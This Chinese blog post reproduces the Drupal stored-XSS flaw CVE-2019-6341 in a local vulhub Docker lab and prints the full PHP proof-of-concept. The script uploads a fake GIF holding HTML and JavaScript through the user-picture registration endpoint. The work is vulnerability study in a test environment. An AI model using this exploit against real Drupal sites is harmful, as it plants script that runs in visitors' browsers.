Drupal XSS漏洞(CVE-2019-6341)

最新推荐文章于 2024-05-17 02:52:44 发布
最新推荐文章于 2024-05-17 02:52:44 发布
阅读量784 收藏 3
点赞数 1
分类专栏: 中间件漏洞复现 文章标签: drupal 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/111824606
版权

声明

好好学习,天天向上

漏洞描述

Drupal诞生于2000年,是一个基于PHP语言编写的开发型CMF(内容管理框架)。在某些情况下,通过文件模块或者子系统上传恶意文件触发XSS漏洞。

影响范围

在7.65之前的Drupal 7版本中

8.6.13之前的Drupal 8.6版本

8.5.14之前的Drupal 8.5版本

复现过程

这里使用8.5.0版本

使用vulhub

/app/vulhub-master/drupal/CVE-2019-6341

使用docker启动

docker-compose build
docker-compose up -d

启动后进入docker,需要改一些东西,不然安装不成功,进入docker后(默认在/var/www/html下),执行

mkdir sites/default/files
cp ./sites/default/default.settings.php ./sites/default/settings.php
chown -R www-data:www-data ../html/

访问,就不会报错了

http://192.168.239.129:8080

将会看到drupal的安装页面,一路默认配置下一步安装。因为没有mysql环境,所以安装的时候可以选择sqlite数据库。

该漏洞需要利用drupal文件模块上传文件的漏洞,伪造一个图片文件,上传,文件的内容实际是一段HTML代码,内嵌JS,这样其他用户在访问这个链接时,就可能触发XSS漏洞。

Drupal 的图片默认存储位置为 /sites/default/files/pictures/<YYYY-MM>/,默认存储名称为其原来的名称,所以之后在利用漏洞时,可以知道上传后的图片的具体位置。

PoC地址

https://github.com/thezdi/PoC/tree/master/Drupal

如图,输入如下命令,即可使用PoC构造样本并完成上传功能,第一个参数为目标IP 第二个参数为目标端口。

执行,当然需要改一下源码,源码里面26行,把端口改成80了,我们只需要进去php,搜索80把端口改成8080,即可,我是把端口,改成命令行第二个参数了

php blog-poc.php 192.168.239.129 8080

我的poc

<?php
/*
usage: php poc.php <target-ip>

Date: 1 March 2019
Exploit Author: TrendyTofu
Original Discoverer: Sam Thomas
Version: <= Drupal 8.6.2
Tested on: Drupal 8.6.2 Ubuntu 18.04 LTS x64 with ext4.
Tested not wokring on: Drupal running on MacOS with APFS
CVE : CVE-2019-6341
Reference: https://www.zerodayinitiative.com/advisories/ZDI-19-291/

*/

$host = $argv[1];
$port = $argv[2];

$pk =   "GET /user/register HTTP/1.1\r\n".
	"Host: ".$host."\r\n".
	"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n".
	"Accept-Language: en-US,en;q=0.5\r\n".
	"Referer: http://".$host."/user/login\r\n".
	"Connection: close\r\n\r\n";

$fp = fsockopen($host,$port,$e,$err,1);
if (!$fp) {die("not connected");}
fputs($fp,$pk);
$out="";
while (!feof($fp)){
  $out.=fread($fp,1);
}
fclose($fp);

preg_match('/name="form_build_id" value="(.*)"/', $out, $match);
$formid = $match[1];
//var_dump($formid);
//echo "form id is:". $formid;
//echo $out."\n";
sleep(1);

$data = 
"Content-Type: multipart/form-data; boundary=---------------------------60928216114129559951791388325\r\n".
"Connection: close\r\n".
"\r\n".
"-----------------------------60928216114129559951791388325\r\n".
"Content-Disposition: form-data; name=\"mail\"\r\n".
"\r\n".
"test324@example.com\r\n".
"-----------------------------60928216114129559951791388325\r\n".
"Content-Disposition: form-data; name=\"name\"\r\n".
"\r\n".
"test2345\r\n".
"-----------------------------60928216114129559951791388325\r\n".
"Content-Disposition: form-data; name=\"files[user_picture_0]\"; filename=\"xxx\xc0.gif\"\r\n".
"Content-Type: image/gif\r\n".
"\r\n".
"GIF\r\n".
"<HTML>\r\n".
"	<HEAD>\r\n".
"		<SCRIPT>alert(123);</SCRIPT>\r\n".
"	</HEAD>\r\n".
"	<BODY>\r\n".
"	</BODY>\r\n".
"</HTML>\r\n".
"-----------------------------60928216114129559951791388325\r\n".
"Content-Disposition: form-data; name=\"user_picture[0][fids]\"\r\n".
"\r\n".
"\r\n".
"-----------------------------60928216114129559951791388325\r\n".
"Content-Disposition: form-data; name=\"user_picture[0][display]\"\r\n".
"\r\n".
"1\r\n".
"-----------------------------60928216114129559951791388325\r\n".
"Content-Disposition: form-data; name=\"form_build_id\"\r\n".
"\r\n".
//"form-KyXRvDVovOBjofviDPTw682MQ8Bf5es0PyF-AA2Buuk\r\n".
$formid."\r\n".
"-----------------------------60928216114129559951791388325\r\n".
"Content-Disposition: form-data; name=\"form_id\"\r\n".
"\r\n".
"user_register_form\r\n".
"-----------------------------60928216114129559951791388325\r\n".
"Content-Disposition: form-data; name=\"contact\"\r\n".
"\r\n".
"1\r\n".
"-----------------------------60928216114129559951791388325\r\n".
"Content-Disposition: form-data; name=\"timezone\"\r\n".
"\r\n".
"America/New_York\r\n".
"-----------------------------60928216114129559951791388325\r\n".
"Content-Disposition: form-data; name=\"_triggering_element_name\"\r\n".
"\r\n".
"user_picture_0_upload_button\r\n".
"-----------------------------60928216114129559951791388325\r\n".
"Content-Disposition: form-data; name=\"_triggering_element_value\"\r\n".
"\r\n".
"Upload\r\n".
"-----------------------------60928216114129559951791388325\r\n".
"Content-Disposition: form-data; name=\"_drupal_ajax\"\r\n".
"\r\n".
"1\r\n".
"-----------------------------60928216114129559951791388325\r\n".
"Content-Disposition: form-data; name=\"ajax_page_state[theme]\"\r\n".
"\r\n".
"bartik\r\n".
"-----------------------------60928216114129559951791388325\r\n".
"Content-Disposition: form-data; name=\"ajax_page_state[theme_token]\"\r\n".
"\r\n".
"\r\n".
"-----------------------------60928216114129559951791388325\r\n".
"Content-Disposition: form-data; name=\"ajax_page_state[libraries]\"\r\n".
"\r\n".
"bartik/global-styling,classy/base,classy/messages,core/drupal.ajax,core/drupal.collapse,core/drupal.timezone,core/html5shiv,core/jquery.form,core/normalize,file/drupal.file,system/base\r\n".
"-----------------------------60928216114129559951791388325--\r\n";

$pk = 	"POST /user/register?element_parents=user_picture/widget/0&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1\r\n".
	"Host: ".$host."\r\n".
	"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\n".
	"Accept: application/json, text/javascript, */*; q=0.01\r\n".
	"Accept-Language: en-US,en;q=0.5\r\n".
	"X-Requested-With: XMLHttpRequest\r\n".
	"Referer: http://" .$host. "/user/register\r\n".
	"Content-Length: ". strlen($data). "\r\n".
	$data;

echo "uploading file, please wait...\n";

for ($i =1; $i <= 2; $i++){
$fp = fsockopen($host,$port,$e,$err,1);
if (!$fp) {die("not connected");}
fputs($fp,$pk);
$out="";
while (!feof($fp)){
  $out.=fread($fp,1);
}
fclose($fp);

echo "Got ".$i."/2 500 errors\n";
//echo $out."\n";
sleep(1);
}

echo "please check /var/www/html/drupal/sites/default/files/pictures/YYYY-MM\n";

?>

在这里插入图片描述

执行完后,访问

http://192.168.239.129:8080/sites/default/files/pictures/2020-12/_0

在这里插入图片描述

关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
维梓-
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
(环境搭建+复现) CVE-2019-6341 Drupal XSS漏洞
daxi0ng的博客
03-20 2422
CVE编号】 CVE-2019-6341漏洞名称】 Drupal XSS漏洞 1【靶标分类】 Web类型类靶标 2【影响版本】 在7.65之前的Drupal 7版本中; 8.6.13之前的Drupal 8.6版本; 8.5.14之前的Drupal 8.5版本。 3【漏洞分类】 XSS 4【漏洞等级】 中 5【漏洞简介】 Drupal诞生于2000年,是一个基于PHP语言编写的开发型CMF(内...
DRUPAL 8.x远程代码执行漏洞(CVE-2018-7600)
errorr0
07-28 1593
drupal命令执行
jQuery-XSS漏洞CVE-2020-11022 CVE-2020-11023)_cve-2020-11023复现
2401_85014040的博客
05-17 592
在大于或等于1.2且在3.5.0之前的jQuery版本中,即使执行了消毒(sanitize)处理,也仍会执行将来自不受信任来源的HTML传递给jQuery的DOM操作方法(即html()、.append()等),从而导致xss漏洞。上面漏洞验证payload代码没有问题,有些可能由于编辑器问题,复制后有些许问题,这里我给出我本地使用的poc,大家下载修改js路径即可使用。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人**
vulhub学习文档-Drupal XSS漏洞
ploto_cs的博客
09-11 1062
Drupal XSS漏洞 一.漏洞介绍 (一)编号 CVE-2019-6341 (二)概述 Drupal诞生于2000年,是一个基于PHP语言编写的开发型CMF(内容管理框架)。在某些情况下,通过文件模块或者子系统上传恶意文件触发XSS漏洞。 (三)影响版本 在7.65之前的Drupal 7版本中; 8.6.13之前的Drupal 8.6版本; 8.5.14之前的Drupal 8.5版本。 (四)漏洞要求 <= Durpal 8.6.6 服务端开启评论配图或者攻击者拥有author以上权限的账号 被
drupal远程代码执行 (CVE-2018-7600)漏洞学习与复现
seek_2022的博客
12-17 4324
CVE-2018-7600漏洞学习与复现
14 - vulhub - Django debug page XSS漏洞CVE-2017-12794)
易编橙 · 终身成长社群,相遇已是上上签!
10-25 689
Django 是一个由 Python 编写的一个开放源代码的 Web 应用框架。 使用 Django,只要很少的代码,Python 的程序开发人员就可以轻松地完成一个正式网站所需要的大部分内容,并进一步开发出全功能的 Web 服务, Django 本身基于 MVC 模型,即 Model(模型)+ View(视图)+ Controller(控制器)设计模式,MVC 模式使后续对程序的修改和扩展简化,并且使程序某一部分的重复利用成为可能。
Drupal远程代码执行漏洞
longwanlian的博客
11-29 633
Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由由内容管理系统和PHP开发框架共同构成,在GPL2.0及更新协议下发布。连续多年荣获全球最佳CMS大奖,是基于PHP语言最著名的WEB应用程序。2018年3月28日,Drupal Security Team官方发布公告称Drupal 6,7,8等多个子版本存在远程代码执行漏洞,攻击者可以利用该漏洞执行恶意代码。
Drupal 远程代码执行漏洞CVE-2019-6339)
limb0的博客
07-04 9002
Drupal 远程代码执行漏洞CVE-2019-6339) 一、漏洞介绍 Drupal core是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。 Drupal core 7.62之前的7.x版本、8.6.6之前的8.6.x版本和8.5.9之前的8.5.x版本中的内置phar stream wrapper(PHP)存在远程代码执行漏洞。远程攻击者可利用该漏洞执行任意的php代码。 二、漏洞危害 远程代码执行。 三、漏洞验证 环境搭建: 实验环境 系统 IP地址 攻击
Drupal远程代码执行漏洞CVE-2019-6340)
锋刃科技的博客
06-24 1603
前言 Drupal官方之前更新了一个非常关键的安全补丁,修复了因为接受的反序列化数据过滤不够严格,在开启REST的Web服务拓展模块的情况下,可能导致PHP代码执行的严重安全。 根据官方公告和自身实践,8.6.x或(<8.6.10)两种情况可能导致问题出现: RESTful Web Services拓展开启,并且启用了REST资源(默认配置即可),不需要区分GET,POST等方法即可完成攻击。 JSON:API服务模块开启,此服务尚未分析。 影响版本 Drupal < 8.6.1.
Drupal Core RESTful远程代码执行漏洞(CVE-2019-6340)
07-10
使用docker-compose命令一步搭建Drupal Core RESTful远程代码执行漏洞(CVE-2019-6340) 的漏洞环境
wp_drupal_timing_attack:用于利用 CVE-2014-9016 和 CVE-2014-9034 的 Python 脚本
07-04
**CVE-2014-9016**,也被称为“Drupalgeddon”,是Drupal内容管理系统(CMS)中的一个严重漏洞。它允许远程未认证的攻击者通过发送特制的HTTP请求,执行任意代码,从而完全控制受影响的Drupal站点。这个漏洞主要存在...
vulhub漏洞复现-jboss反序列化漏洞复现
weixin_45095113的博客
12-21 647
vulhub漏洞复现-jboss反序列化漏洞
Drupal 远程代码执行漏洞CVE-2018-7602)漏洞复现
ADummy的博客
02-23 1004
Drupal 远程代码执行漏洞CVE-2018-7602) by ADummy 0x00利用路线 ​ poc直接打 0x01漏洞介绍 ​ 此漏洞源于对编号为CVE-2018-7600的漏洞修复不完全,导致补丁被绕过,攻击者可以利用Drupal网站漏洞,需要登录且有删除权限后触发执行恶意代码,导致网站被完全控制。 影响版本 Drupal < 7.58 Drupal < 8.3.9 Drupal < 8.4.6 Drupal < 8.5.1 0x02漏洞复现 exp地址:pi
开源内容管理系统Drupal 修复信息泄露和 XSS 漏洞
smellycat000的专栏
09-18 486
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队本周,开源的内容管理系统Drupal修复了多个信息泄露和跨站点脚本(XSS)漏洞,其中包括一个“严重”级别的漏洞。其...
漏洞复现】Drupal 远程代码执行漏洞(CVE-2018-7600)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-12 848
Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成该漏洞的产生的根本原因在于Drupal对表单的渲染上,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻击的网站。...
drupal-cve2019-6340
最新发布
05-25
Drupal-cve2019-6340是Drupal内容管理系统(CMS)的一个安全漏洞。它被标记为“严重”的漏洞,可以允许攻击者执行任意代码,从而完全控制受影响的Drupal网站。 该漏洞存在于Drupal 8.6.x版本和8.5.x版本中,如果未正确配置,攻击者可以通过发送特定的请求利用该漏洞。攻击者可以通过该漏洞远程执行代码,并访问受影响网站上的敏感信息。 Drupal团队已经发布了针对该漏洞的补丁程序,建议Drupal用户尽快升级到最新版本以避免受到攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值